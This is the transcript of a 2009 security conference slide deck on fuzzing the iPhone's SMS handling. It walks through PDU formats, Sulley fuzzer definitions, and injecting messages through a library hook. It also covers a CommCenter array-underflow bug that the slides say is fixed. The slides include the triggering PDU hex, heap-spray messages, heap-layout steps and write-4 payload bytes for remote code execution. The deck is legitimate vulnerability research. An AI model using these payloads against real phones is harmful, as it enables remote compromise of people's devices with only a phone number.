iphone: fuzzing and payloads

66
iPhone: Fuzzing and iPhone: Fuzzing and Payloads Payloads Charlie Miller Charlie Miller Independent Security Evaluators Independent Security Evaluators [email protected] [email protected] Follow me on twitter: 0xcharlie Follow me on twitter: 0xcharlie

Upload: mirit

Post on 28-Jan-2016

46 views

Category:

Documents


0 download

DESCRIPTION

iPhone: Fuzzing and Payloads. Charlie Miller Independent Security Evaluators [email protected] Follow me on twitter: 0xcharlie. Who am I?. Principal Analyst, Independent Security Evaluators First to hack the iPhone, G1 Android Phone - PowerPoint PPT Presentation

TRANSCRIPT

Page 1: iPhone: Fuzzing and Payloads

iPhone: Fuzzing and iPhone: Fuzzing and PayloadsPayloadsCharlie MillerCharlie MillerIndependent Security EvaluatorsIndependent Security Evaluators

[email protected]@securityevaluators.com

Follow me on twitter: 0xcharlieFollow me on twitter: 0xcharlie

Page 2: iPhone: Fuzzing and Payloads

Who am I?Who am I?

Principal Analyst, Independent Security Principal Analyst, Independent Security EvaluatorsEvaluators

First to hack the iPhone, G1 Android PhoneFirst to hack the iPhone, G1 Android Phone

First to hack the “virtual world” (Second Life)First to hack the “virtual world” (Second Life)

Pwn2Own winner, 2008, 2009Pwn2Own winner, 2008, 2009

Author: Mac Hacker’s HandbookAuthor: Mac Hacker’s Handbook

Page 3: iPhone: Fuzzing and Payloads

About this talkAbout this talk

Summary of two 75 minute talksSummary of two 75 minute talks

Reducing 150+ min down to 60 min is not Reducing 150+ min down to 60 min is not funfun

Fuzzing the Phone in your PhoneFuzzing the Phone in your Phone

with Collin Mullinerwith Collin Mulliner

Post Exploitation Bliss, Meterpreter for iPhonePost Exploitation Bliss, Meterpreter for iPhone

with Vincenzo Iozzowith Vincenzo Iozzo

Page 4: iPhone: Fuzzing and Payloads

AgendaAgenda

iPhone basicsiPhone basics

SMSSMS

Sulley and fuzzing SMSSulley and fuzzing SMS

SMS injectionSMS injection

SMS exploitationSMS exploitation

iPhone 2.0 code injectioniPhone 2.0 code injection

Meterpreter on iPhoneMeterpreter on iPhone

Page 5: iPhone: Fuzzing and Payloads

iPhone BackgroundiPhone Background

Page 6: iPhone: Fuzzing and Payloads

Security Architecture Security Architecture OverviewOverview

Reduced attack surfaceReduced attack surface

Stripped down OSStripped down OS

Code signingCode signing

Randomization (or lack thereof)Randomization (or lack thereof)

SandboxingSandboxing

Memory protectionsMemory protections

Page 7: iPhone: Fuzzing and Payloads

History of iPhone History of iPhone researchresearch

iPhone 1.0 - June 2007iPhone 1.0 - June 2007

Everything ran as rootEverything ran as root

No sandboxingNo sandboxing

No ASLR/DEPNo ASLR/DEP

No code signingNo code signing

Hacked within a couple of weeksHacked within a couple of weeks

At least 3 public remote code exploitsAt least 3 public remote code exploits

Page 8: iPhone: Fuzzing and Payloads

iPhone 2.0iPhone 2.0

Released July 2008Released July 2008

Includes App Store, SDKIncludes App Store, SDK

App sandboxingApp sandboxing

DEP but no ASLRDEP but no ASLR

Code signingCode signing

Most apps run as user mobileMost apps run as user mobile

Major upgrade of security!Major upgrade of security!

Can circumvent DEPCan circumvent DEP

Page 9: iPhone: Fuzzing and Payloads

Most significantlyMost significantly

No public, remote code exploit for iPhone 2.0 or No public, remote code exploit for iPhone 2.0 or laterlater

Even survived Pwn2OwnEven survived Pwn2Own

Page 10: iPhone: Fuzzing and Payloads

iPhone 3.0iPhone 3.0

Added MMSAdded MMS

Fixed DEP circumvention (more on this later)Fixed DEP circumvention (more on this later)

Still no ASLRStill no ASLR

Device is way more secure than typical Snow Device is way more secure than typical Snow Leopard computerLeopard computer

Page 11: iPhone: Fuzzing and Payloads

SMSSMS

Page 12: iPhone: Fuzzing and Payloads

SMSSMS

Uses extra bandwidth in control channel (used for Uses extra bandwidth in control channel (used for establishing calls, status, etc)establishing calls, status, etc)

Message data limited to 140 bytes (160 7-bit characters)Message data limited to 140 bytes (160 7-bit characters)

Commonly used for for “text messages”Commonly used for for “text messages”

Can also deliver binary dataCan also deliver binary data

OTA programmingOTA programming

ringtones ringtones

Building block for essential services on the mobile phoneBuilding block for essential services on the mobile phone

Page 13: iPhone: Fuzzing and Payloads

Why pick on SMS? Why pick on SMS?

SMS is received by and processed by almost all phonesSMS is received by and processed by almost all phones

No way to firewall it (and still receive calls/texts)No way to firewall it (and still receive calls/texts)

SMS is processed with no user interactionSMS is processed with no user interaction

Server side attack surface with no firewall, I’m having Server side attack surface with no firewall, I’m having a 1990’s flashback!a 1990’s flashback!

Can be targeted with only a phone numberCan be targeted with only a phone number

SMS firewalls/filter exist on network but those on the SMS firewalls/filter exist on network but those on the phones are too high in the stack to protect against phones are too high in the stack to protect against these attacksthese attacks

Page 14: iPhone: Fuzzing and Payloads

On the deviceOn the device

Phone has 2 processors, application processor and Phone has 2 processors, application processor and modemmodem

Modem runs a specialized real time operating system Modem runs a specialized real time operating system that handles all communication with cellular network that handles all communication with cellular network

Communication between CPUs is via logical serial linesCommunication between CPUs is via logical serial lines

Text based GSM AT command set usedText based GSM AT command set used

Page 15: iPhone: Fuzzing and Payloads

Continued life of SMSContinued life of SMS

When an SMS arrives at the modem, the modem When an SMS arrives at the modem, the modem uses an unsolicited AT command result codeuses an unsolicited AT command result code

This consists of 2 lines of textThis consists of 2 lines of text

The result code and the number of bytes of the The result code and the number of bytes of the next linenext line

The actual SMS message (in PDU mode)The actual SMS message (in PDU mode)

+CMT: ,300791947106004034040D91947196466656F80000+CMT: ,300791947106004034040D91947196466656F80000901082114215400AE8329BFD4697D9EC377D901082114215400AE8329BFD4697D9EC377D

Page 16: iPhone: Fuzzing and Payloads

A PDUA PDU0707919194710600403494710600403404040D0D9191947196466656F8947196466656F80000000090108211421540901082114215400A0AE8329BFD4697D9EC377DE8329BFD4697D9EC377D

FieldField SizeSize BytesBytes

Length of SMSC address 1 byte 0707

Type of address 1 byte 9191

SMSC address variable 947106004034

DELIVER 1 byte 0404

Length of sender address 1 byte 0D0D

Type of sender address 1 byte 9191

sender address variable 947196466656F8

TP-PID 1 byte 0000

TP-DCS 1 byte 0000

TP-SCTS 7 bytes 9010821142154090108211421540

TP-UDL 1 byte 0A0A

TP-UD variable AE8329BFD4697D9EC377DAE8329BFD4697D9EC377D

Page 17: iPhone: Fuzzing and Payloads

But there is moreBut there is more

The previous PDU was the simplest message The previous PDU was the simplest message possible, 7-bit immediate alert (i.e. a text possible, 7-bit immediate alert (i.e. a text message)message)

Can also send binary data in the UD fieldCan also send binary data in the UD field

This is prefaced with the User Data Header (UDH)This is prefaced with the User Data Header (UDH)

Page 18: iPhone: Fuzzing and Payloads

UDH exampleUDH example

050500000303000301000301

FieldField SizeSize BytesBytes

UDHLUDHL 1 byte1 byte 0505

IEIIEI 1 byte1 byte 0000

IEDLIEDL 1 byte1 byte 0303

IEDIED VariableVariable 000301000301

Page 19: iPhone: Fuzzing and Payloads

UDH example 1UDH example 1

Concatenated messagesConcatenated messages

Can send more than 160 bytesCan send more than 160 bytes

IEI = 00 -> concatenated with 8 bit reference IEI = 00 -> concatenated with 8 bit reference numbernumber

IEDL = 03 -> 3 bytes of dataIEDL = 03 -> 3 bytes of data

Reference number = 00Reference number = 00

Total number of messages = 03Total number of messages = 03

This message number = 01This message number = 01

050500000303000003030101

Page 20: iPhone: Fuzzing and Payloads

Other common UDH IEI’sOther common UDH IEI’s

IEI 01 = voice mail availableIEI 01 = voice mail available

IEI 05 = port numbers (application can register)IEI 05 = port numbers (application can register)

Port 5499 = visual voicemailPort 5499 = visual voicemail

allntxacds12.attwireless.net:5400?allntxacds12.attwireless.net:5400?f=0&v=400&m=XXXXXXX&p=&s=5433&t=4:XXf=0&v=400&m=XXXXXXX&p=&s=5433&t=4:XXXXXXX:A:IndyAP36:ms01:client:46173XXXXX:A:IndyAP36:ms01:client:46173

Port 2948 = WAP pushPort 2948 = WAP push

Page 21: iPhone: Fuzzing and Payloads

PDU SpyPDU Spy

http://www.nobbi.com/pduspy.html

Page 22: iPhone: Fuzzing and Payloads

Sulley and fuzzing SMSSulley and fuzzing SMS

Page 23: iPhone: Fuzzing and Payloads

SulleySulley

A fuzzing framework implemented in Python by A fuzzing framework implemented in Python by Pedram Amini and Aaron PortnoyPedram Amini and Aaron Portnoy

Provides test case generation, test case sending, Provides test case generation, test case sending, target monitoring, post mortem analysistarget monitoring, post mortem analysis

We only use it for test case generationWe only use it for test case generation

Block based approach to dig deep into the protocolBlock based approach to dig deep into the protocol

Contains library of effective fuzzing strings and Contains library of effective fuzzing strings and integersintegers

Super SPIKE or underdeveloped PEACHSuper SPIKE or underdeveloped PEACH

Page 24: iPhone: Fuzzing and Payloads

Sulley example: SMSC Sulley example: SMSC numbernumber

FieldField SizeSize BytesBytes

Length of SMSC address 1 byte 0707

Type of address 1 byte 9191

SMSC address variable 947106004034

s_size("smsc_number", format="oct", length=1, math=lambda x: x/2)if s_size("smsc_number", format="oct", length=1, math=lambda x: x/2)if s_block_start("smsc_number"): s_byte(0x91, format="oct", s_block_start("smsc_number"): s_byte(0x91, format="oct", name="typeofaddress") if s_block_start("smsc_number_data", name="typeofaddress") if s_block_start("smsc_number_data", encoder=eight_bit_encoder): s_string("\x94\x71\x06\x00\encoder=eight_bit_encoder): s_string("\x94\x71\x06\x00\x40\x34", max_len = 256) s_block_end()s_block_end()x40\x34", max_len = 256) s_block_end()s_block_end()

Page 25: iPhone: Fuzzing and Payloads

Sulley example: UDHSulley example: UDH

if s_block_start("eight_bit", dep="tp_dcs", dep_values=["04"]): if s_block_start("eight_bit", dep="tp_dcs", dep_values=["04"]): s_size("message_eight", format="oct", length=1, math=lambda x: x / 2) if s_size("message_eight", format="oct", length=1, math=lambda x: x / 2) if s_block_start("message_eight"): s_size("udh_eight", format="oct", length=1, s_block_start("message_eight"): s_size("udh_eight", format="oct", length=1, math=lambda x: x / 2) if s_block_start("udh_eight"): math=lambda x: x / 2) if s_block_start("udh_eight"): s_byte(0x00, format="oct", fuzzable=True) s_size("ied_eight", s_byte(0x00, format="oct", fuzzable=True) s_size("ied_eight", format="oct", length=1, math=lambda x: x / 2) if format="oct", length=1, math=lambda x: x / 2) if s_block_start("ied_eight", encoder=eight_bit_encoder): s_block_start("ied_eight", encoder=eight_bit_encoder): s_string("\x00\x03\x01", max_len = 256) s_block_end() s_string("\x00\x03\x01", max_len = 256) s_block_end() s_block_end() if s_block_start("text_eight", encoder=eight_bit_encoder): s_block_end() if s_block_start("text_eight", encoder=eight_bit_encoder): s_string(" Test12345BlaBlubber231...Collin", max_len = 256) s_string(" Test12345BlaBlubber231...Collin", max_len = 256) s_block_end() s_block_end()s_block_end() s_block_end() s_block_end()s_block_end()

FieldField SizeSize BytesBytes

UDHLUDHL 1 byte1 byte 0505

IEIIEI 1 byte1 byte 0000

IEDLIEDL 1 byte1 byte 0303

IEDIED VariableVariable 000301000301

Page 26: iPhone: Fuzzing and Payloads

SMS injectionSMS injection

Page 27: iPhone: Fuzzing and Payloads

Sending the test casesSending the test cases

Could send over the airCould send over the air

Costs $$$$Costs $$$$

Telco’s get to watch you fuzzTelco’s get to watch you fuzz

You might (make that WILL) crash Telco’s equipmentYou might (make that WILL) crash Telco’s equipment

Could build your own transmitterCould build your own transmitter

That sounds hard!That sounds hard!

Could inject into the process which parsesCould inject into the process which parses

Would be very device/firmware dependentWould be very device/firmware dependent

Page 28: iPhone: Fuzzing and Payloads

SMS injectionSMS injectionWe MITM the channel between the application processor and the We MITM the channel between the application processor and the modemmodem

Can send messages quicklyCan send messages quickly

Its freeIts free

Requires no special equipmentRequires no special equipment

The receiving process doesn’t know the messages weren’t legitThe receiving process doesn’t know the messages weren’t legit

Telco (mostly) doesn’t know its happeningTelco (mostly) doesn’t know its happening

Warning: results need to be verified over the carrier networkWarning: results need to be verified over the carrier network

Page 29: iPhone: Fuzzing and Payloads

Man in the MiddleMan in the Middle

Use Library Pre-loading to hook basic APIUse Library Pre-loading to hook basic API

open, read, writeopen, read, write

com.apple.CommCenter.plist:com.apple.CommCenter.plist:... ... <key>EnvironmentVariables</<key>EnvironmentVariables</key><dict><key>DYLD_FORCE_FLAT_NAMESPACE</key> key><dict><key>DYLD_FORCE_FLAT_NAMESPACE</key> <string>1</string><string>1</string><key>DYLD_INSERT_LIBRARIES</key><string>/System/Library/<key>DYLD_INSERT_LIBRARIES</key><string>/System/Library/Test/libopen.0.dylib</string>Test/libopen.0.dylib</string>

</dict></dict>......

Page 30: iPhone: Fuzzing and Payloads

Sending PDU’sSending PDU’s

def send_pdu(ip_address, line):leng = (len(line) / 2) - def send_pdu(ip_address, line):leng = (len(line) / 2) - 8buffer = "\n+CMT: ,%d\n%s\n" % (leng, line)s = 8buffer = "\n+CMT: ,%d\n%s\n" % (leng, line)s = socket.socket(socket.AF_INET, socket.socket(socket.AF_INET, socket.SOCK_STREAM)s.connect((ip_addresss, socket.SOCK_STREAM)s.connect((ip_addresss, 4223))s.send(buffer)s.close()4223))s.send(buffer)s.close()

Page 31: iPhone: Fuzzing and Payloads

An SMS bug & exploitAn SMS bug & exploit

Page 32: iPhone: Fuzzing and Payloads

From potential bug to From potential bug to attackattack

Not all bugs found through injection can be sent over the Not all bugs found through injection can be sent over the networknetwork

Test-send fuzzing results over the networkTest-send fuzzing results over the network

Messages that go through are real attacksMessages that go through are real attacks

We built a small application that runs on an iPhoneWe built a small application that runs on an iPhone

Easy testing while logged in via SSHEasy testing while logged in via SSH

Awesome demo tool via mobile terminalAwesome demo tool via mobile terminal

Test different operatorsTest different operators

Not all operators allow all kinds of messagesNot all operators allow all kinds of messages

May not be able to attack people on all networksMay not be able to attack people on all networks

Page 33: iPhone: Fuzzing and Payloads

Send over the networkSend over the networkOpen /dev/tty.debugOpen /dev/tty.debug

Read/write AT commands to send messageRead/write AT commands to send message

Page 34: iPhone: Fuzzing and Payloads

iPhone CommCenter iPhone CommCenter VulnVuln

Process: CommCenter [900]Path: Process: CommCenter [900]Path: /System/Library/PrivateFrameworks/CoreTelephony.framework/Support/CommCenterIdentifier: /System/Library/PrivateFrameworks/CoreTelephony.framework/Support/CommCenterIdentifier: CommCenterVersion: ??? (???)Code Type: ARM (Native)Parent Process: launchd CommCenterVersion: ??? (???)Code Type: ARM (Native)Parent Process: launchd [1]Date/Time: 2009-06-16 03:36:27.698 -0500OS Version: iPhone OS 2.2 (5G77)Report [1]Date/Time: 2009-06-16 03:36:27.698 -0500OS Version: iPhone OS 2.2 (5G77)Report Version: 103Exception Type: EXC_BAD_ACCESS (SIGBUS)Exception Codes: KERN_PROTECTION_FAILURE at Version: 103Exception Type: EXC_BAD_ACCESS (SIGBUS)Exception Codes: KERN_PROTECTION_FAILURE at 0x303434fcCrashed Thread: 6...0x303434fcCrashed Thread: 6...Thread 6 Crashed:0 libstdc++.6.dylib Thread 6 Crashed:0 libstdc++.6.dylib 0x30069da8 0x30069da8 __gnu_cxx::__exchange_and_add(int volatile*, int) + 121 libstdc++.6.dylib __gnu_cxx::__exchange_and_add(int volatile*, int) + 121 libstdc++.6.dylib 0x30053270 std::basic_string<char, std::char_traits<char>, std::allocator<char> 0x30053270 std::basic_string<char, std::char_traits<char>, std::allocator<char> >::_Rep::_M_dispose(std::allocator<char> const&) + 362 libstdc++.6.dylib >::_Rep::_M_dispose(std::allocator<char> const&) + 362 libstdc++.6.dylib 0x30053330 std::basic_string<char, std::char_traits<char>, std::allocator<char> 0x30053330 std::basic_string<char, std::char_traits<char>, std::allocator<char> >::assign(std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) + 1563 >::assign(std::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) + 1563 CommCenter CommCenter 0x00039d7e 0x1000 + 2328300x00039d7e 0x1000 + 232830

Fixed in 3.0.1

Fixed in 3.0.1

Page 35: iPhone: Fuzzing and Payloads

““Listen, and understand. That exploit is out Listen, and understand. That exploit is out there. It can't be bargained with. It can't be there. It can't be bargained with. It can't be

reasoned with. It doesn't feel pity, or reasoned with. It doesn't feel pity, or remorse, or fear. And it absolutely will not remorse, or fear. And it absolutely will not

stop, ever, until you are pwned”... Kyle Reesestop, ever, until you are pwned”... Kyle ReeseThe TerminatorThe Terminator040003X

XXX

040003XXXX

Page 36: iPhone: Fuzzing and Payloads

Let’s take a closer lookLet’s take a closer look

Page 37: iPhone: Fuzzing and Payloads

The issueThe issue

Read_next_byte returns the next (decoded) Read_next_byte returns the next (decoded) byte or -1 if there is no more databyte or -1 if there is no more data

Since enough data is not explicitly checked, Since enough data is not explicitly checked, you can arrange to have you can arrange to have

This message number be -1This message number be -1

Total message and This message to be -1Total message and This message to be -1

Or any other field...Or any other field...

Page 38: iPhone: Fuzzing and Payloads

Bug (This msg = -1)Bug (This msg = -1)

0791947106004034C40D91947196466656F8000490108211421540040791947106004034C40D91947196466656F80004901082114215400404040000030301012020

Page 39: iPhone: Fuzzing and Payloads

Bad “This”Bad “This”

An array of C++ strings is allocated, of size Total numberAn array of C++ strings is allocated, of size Total number

When a new concatenated msg arrives, it indexes into When a new concatenated msg arrives, it indexes into this array by (This number - 1) this array by (This number - 1)

Explicitly checks its not too big or 0Explicitly checks its not too big or 0

If This number is -1, it underflows the arrayIf This number is -1, it underflows the array

It compares this string to a NULL stringIt compares this string to a NULL string

If it is not equal, we know we already received a If it is not equal, we know we already received a message with This number, so ignore this msgmessage with This number, so ignore this msg

If not assign the data from the msg to the string in the If not assign the data from the msg to the string in the arrayarray

Page 40: iPhone: Fuzzing and Payloads

CompareCompare

Page 41: iPhone: Fuzzing and Payloads

Comparing Null StringComparing Null String

The only way to pass this test is to have a The only way to pass this test is to have a “length” of 0“length” of 0

This length is stored in the first dword of the This length is stored in the first dword of the bufferbuffer

(at location -0xc from the pointer)(at location -0xc from the pointer)

To pass the test, need 00000000 at ptr - 0xcTo pass the test, need 00000000 at ptr - 0xc

Page 42: iPhone: Fuzzing and Payloads

AssignAssign

Page 43: iPhone: Fuzzing and Payloads

AssignAssign

Replaces old string data with new string dataReplaces old string data with new string data

Adjusts lengthsAdjusts lengths

Disposes old stringDisposes old string

Decrements reference counter (at pointer - Decrements reference counter (at pointer - 0x4)0x4)

free()’s buffer (from pointer - 0xc)free()’s buffer (from pointer - 0xc)

Page 44: iPhone: Fuzzing and Payloads

Need 2 thingsNeed 2 things

Step 1: control the dword (pointer) before the array of Step 1: control the dword (pointer) before the array of strings (actually we want array[-2])strings (actually we want array[-2])

Step 2: Point it at memory that begins with 00000000Step 2: Point it at memory that begins with 00000000

Then we can decrement the dword at pointer+8Then we can decrement the dword at pointer+8

We can free(pointer)We can free(pointer)

Either of these two things are enough for exploitationEither of these two things are enough for exploitation

But can you manipulate the heap with only SMS???But can you manipulate the heap with only SMS???

Page 45: iPhone: Fuzzing and Payloads

Again with the Again with the concatenated messagesconcatenated messages

Each time a new reference number appears, an array of strings Each time a new reference number appears, an array of strings is allocated (size Total * 4)is allocated (size Total * 4)

Each time a new message for that ref number appears, a Each time a new message for that ref number appears, a string is allocated to store the datastring is allocated to store the data

Buffer of size 0x2d, 0x4d, 0x8d, 0x10dBuffer of size 0x2d, 0x4d, 0x8d, 0x10d

When the concatenated message is completeWhen the concatenated message is complete

These pointers are all freed when all the messages have These pointers are all freed when all the messages have arrived (but not before)arrived (but not before)

All strings are appended into one big stringAll strings are appended into one big string

Which is then free’d shortly thereafterWhich is then free’d shortly thereafter

Page 46: iPhone: Fuzzing and Payloads

Our heap weaponsOur heap weapons

Can allocate data in buffers up to size 144 Can allocate data in buffers up to size 144 (data of SMS message)(data of SMS message)

Can control when (or if) these guys are free’dCan control when (or if) these guys are free’d

Can allocate different sized buffers of pointers Can allocate different sized buffers of pointers to C++ strings (up to size 1024 bytes)to C++ strings (up to size 1024 bytes)

Can control when (or if) these guys are free’dCan control when (or if) these guys are free’d

Can create long strings of data up to size 36k, Can create long strings of data up to size 36k, free’d immediatelyfree’d immediately

That’s it! But that’s enoughThat’s it! But that’s enough

Page 47: iPhone: Fuzzing and Payloads

OS X memory OS X memory managementmanagement

Different regionsDifferent regions

Tiny: allocation <= 0x1f0 (496 bytes)Tiny: allocation <= 0x1f0 (496 bytes)

Small: 0x1f0 < allocation <= 0x3c00 (15,360 bytes)Small: 0x1f0 < allocation <= 0x3c00 (15,360 bytes)

2 others not applicable to SMS...2 others not applicable to SMS...

Each region maintains a list of free’d pointersEach region maintains a list of free’d pointers

Malloc tries to return the first free’d pointer that is big Malloc tries to return the first free’d pointer that is big enough to hold the new bufferenough to hold the new buffer

If that buffer is bigger than needed, the rest is put on the If that buffer is bigger than needed, the rest is put on the free’d list again in a smaller slotfree’d list again in a smaller slot

Page 48: iPhone: Fuzzing and Payloads

Heap spray, 140 bytes at a Heap spray, 140 bytes at a timetime

Send a bunch of SMS’s with different This numbers for Send a bunch of SMS’s with different This numbers for large Total number and different reference numberslarge Total number and different reference numbers

You can get 140 = 0x8c bytes allocated which contain You can get 140 = 0x8c bytes allocated which contain arbitrary binary data (in a 0x90 byte buffer)arbitrary binary data (in a 0x90 byte buffer)

8-bit ref: get 0x90 * 254 msgs * 255 ref #’s = 9 MB8-bit ref: get 0x90 * 254 msgs * 255 ref #’s = 9 MB

16-bit ref: get > 2GB16-bit ref: get > 2GB

No indication on the phone these messages are No indication on the phone these messages are arriving since they are never complete!arriving since they are never complete!

Page 49: iPhone: Fuzzing and Payloads

0791947106004034C40D91947196466656F800049010821142154086050003f0640791947106004034C40D91947196466656F800049010821142154086050003f0640101414141414141414141414141414141414141414141414414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141411414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141410791947106004034C40D91947196466656F800049010821142154086050003f0640791947106004034C40D91947196466656F800049010821142154086050003f0640202414141414141414141414141414141414141414141414414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141411414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141410791947106004034C40D91947196466656F800049010821142154086050003f0640791947106004034C40D91947196466656F800049010821142154086050003f064030341414141414141414141414141414141414141414141441414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141

00337fdc | 41414141 41414141 41414141 41414141 00337fec | 41414141 41414141 41414141 41414141 00337ffc | 41414141 41414141 41414141 41414141 0033800c | 41414141 41414141 41414141 41414141 0033801c | 41414141 41414141 41414141 41414141 0033802c | 41414141 00337fdc | 41414141 41414141 41414141 41414141 00337fec | 41414141 41414141 41414141 41414141 00337ffc | 41414141 41414141 41414141 41414141 0033800c | 41414141 41414141 41414141 41414141 0033801c | 41414141 41414141 41414141 41414141 0033802c | 41414141 41414141 41414141 41414141 0033803c | 41414141 41414141 41414141 41414141 0033804c | 00000000 00000080 00000080 00000000 0033805c | 41414141 41414141 41414141 41414141 0033806c | 41414141 41414141 41414141 41414141 0033807c | 41414141 41414141 41414141 41414141 41414141 41414141 41414141 0033803c | 41414141 41414141 41414141 41414141 0033804c | 00000000 00000080 00000080 00000000 0033805c | 41414141 41414141 41414141 41414141 0033806c | 41414141 41414141 41414141 41414141 0033807c | 41414141 41414141 41414141 41414141 0033808c | 41414141 41414141 41414141 41414141 0033809c | 41414141 41414141 41414141 41414141 003380ac | 41414141 41414141 41414141 41414141 003380bc | 41414141 41414141 41414141 41414141 003380cc | 41414141 41414141 41414141 41414141 003380dc | 00000000 0033808c | 41414141 41414141 41414141 41414141 0033809c | 41414141 41414141 41414141 41414141 003380ac | 41414141 41414141 41414141 41414141 003380bc | 41414141 41414141 41414141 41414141 003380cc | 41414141 41414141 41414141 41414141 003380dc | 00000000 00000080 00000080 00000000 003380ec | 41414141 41414141 41414141 41414141 003380fc | 41414141 41414141 41414141 41414141 0033810c | 41414141 41414141 41414141 41414141 0033811c | 41414141 41414141 41414141 41414141 0033812c | 41414141 41414141 41414141 41414141 00000080 00000080 00000000 003380ec | 41414141 41414141 41414141 41414141 003380fc | 41414141 41414141 41414141 41414141 0033810c | 41414141 41414141 41414141 41414141 0033811c | 41414141 41414141 41414141 41414141 0033812c | 41414141 41414141 41414141 41414141 0033813c | 41414141 41414141 41414141 41414141 0033814c | 41414141 41414141 41414141 414141410033813c | 41414141 41414141 41414141 41414141 0033814c | 41414141 41414141 41414141 41414141... ...

Page 50: iPhone: Fuzzing and Payloads

AlsoAlso

Can do stuff like mini-heap feng shei if you alternate Can do stuff like mini-heap feng shei if you alternate sending in messages with two different reference sending in messages with two different reference numbersnumbers

Ref1, This 1Ref1, This 1

Ref2, This 1Ref2, This 1

Ref1, This 2Ref1, This 2

......

Then “complete” one of them to get the buffers free’dThen “complete” one of them to get the buffers free’d

This gives you “holes” in the heapThis gives you “holes” in the heap

Page 51: iPhone: Fuzzing and Payloads

Mobile Heap Feng ShuiMobile Heap Feng Shui30052820> dd 008293e0008293e0 | 41414141 41414141 30052820> dd 008293e0008293e0 | 41414141 41414141 41414141 41414141 008293f0 | 41414141 41414141 41414141 41414141 008293f0 | 41414141 41414141 4141414141414141 41414141 41414141 0082940000829400 | 38012fbc 38012fbc | 38012fbc 38012fbc 38012fbc 38012fbc 00829410 | 38012fbc 38012fbc 38012fbc 38012fbc 00829410 | 38012fbc 38012fbc 38012fbc 38012fbc 00829420 | 38012fbc 38012fbc 38012fbc 38012fbc 00829420 | 38012fbc 38012fbc 38012fbc 38012fbc 00829430 | 38012fbc 38012fbc 38012fbc 38012fbc 00829430 | 38012fbc 38012fbc 38012fbc 38012fbc 00829440 | 38012fbc 38012fbc 38012fbc 38012fbc 00829440 | 38012fbc 38012fbc 38012fbc 38012fbc 00829450 | 38012fbc 38012fbc 38012fbc 38012fbc 00829450 | 38012fbc 38012fbc 38012fbc 38012fbc 38012fbc 38012fbc ACCESS VIOLATIONr0=00053268ACCESS VIOLATIONr0=00053268 r1=00053268r1=00053268r2=0032c7c0r2=0032c7c0 r3=00829400r3=00829400 r4=0032c7c0r4=0032c7c0r5=00036bc5r5=00036bc5 r6=r6=4141414141414141 r7=00603a68r7=00603a68r8=00053268r8=00053268 r9=0082a200r9=0082a200 r10=00000000r10=00000000r11=00000000r11=00000000 r12=00063014r12=00063014 sp=00603a50sp=00603a50lr=00039d3flr=00039d3f pc=30052820pc=30052820 ctrl=20000010ctrl=20000010 libstdc+libstdc++.6.dylib!__ZNKSs7+.6.dylib!__ZNKSs7comparecompareEPKc+1c:pc=30052820 0c 50 EPKc+1c:pc=30052820 0c 50 16 e5 16 e5 ldrldr r5, [r6, -#12]r5, [r6, -#12]

array[-2]array[-2]arrayarray

heapheapholehole

Page 52: iPhone: Fuzzing and Payloads

What to decrement?What to decrement?

Gotta be something with a zero dword before itGotta be something with a zero dword before it

Must be at a consistent, guessable, addressMust be at a consistent, guessable, address

Decrementing it should help usDecrementing it should help us

Pointer in the free’d list!Pointer in the free’d list!

If we decrement it so it points to our data then If we decrement it so it points to our data then when it gets re-used for a malloc an unlinking when it gets re-used for a malloc an unlinking will occurwill occur

This gives us a write-4 primitiveThis gives us a write-4 primitive

Page 53: iPhone: Fuzzing and Payloads

The dreamThe dreamOur data is right before an array of C++ strings which we can Our data is right before an array of C++ strings which we can underflow (so it reads our user controlled pointer)underflow (so it reads our user controlled pointer)

We have data before a pointer in the free’d listWe have data before a pointer in the free’d list

(and this pointer stays at the beginning of the free list when (and this pointer stays at the beginning of the free list when we do all this stuff)we do all this stuff)

We decrement the pointer so the free’d list pointer points to We decrement the pointer so the free’d list pointer points to our dataour data

We cause an allocation to occur which uses this free’d pointerWe cause an allocation to occur which uses this free’d pointer

This buffer is unlinked from the free list which gives us a write-This buffer is unlinked from the free list which gives us a write-4 (we control metadata)4 (we control metadata)

We write-4 to the global offset tableWe write-4 to the global offset table

Get that function pointer calledGet that function pointer called

Page 54: iPhone: Fuzzing and Payloads

ExploitExploit

Msg 1: Allocate 2/3 of small concatenated message (so it will end Msg 1: Allocate 2/3 of small concatenated message (so it will end up in tiny region)up in tiny region)

Msg 2, 3: Allocate n/(n+1) of a concat msg for some nMsg 2, 3: Allocate n/(n+1) of a concat msg for some n

Msg 3: Allocate n/n of a concat msgMsg 3: Allocate n/n of a concat msg

Gives holes in memory Gives holes in memory andand clears out free list clears out free list

Send last bit of Msg1 to put it on the free list (with lots of other Send last bit of Msg1 to put it on the free list (with lots of other smaller guys on the free list ready to get used) smaller guys on the free list ready to get used)

This is the guy we want to decrementThis is the guy we want to decrement

Create 16 new messages with This msg = -1Create 16 new messages with This msg = -1

Each does 1 decrement to the free list pointerEach does 1 decrement to the free list pointer

Send in array request of size 0x7bSend in array request of size 0x7b

Page 55: iPhone: Fuzzing and Payloads

Our dataOur dataFor demo of write-4:For demo of write-4:

4242424242424242fecabebafecabebabb6fabf7bb6fabf7dc800f00dc800f00

unchecksum(0xf7ab6fbb) = 0xdeadbee0unchecksum(0xf7ab6fbb) = 0xdeadbee0

0x000f80dc 0x000f80dc points to our string+4 on the free points to our string+4 on the free listlist

For live hot action:For live hot action:

4242424242424242fecabebafecabebaa78c01c0a78c01c0dc800f00dc800f00

unchecksum(0xc0018ca7) = 0x63290 = unchecksum(0xc0018ca7) = 0x63290 = pthread_mutex_lockpthread_mutex_lock

Page 56: iPhone: Fuzzing and Payloads

Write-4Write-4

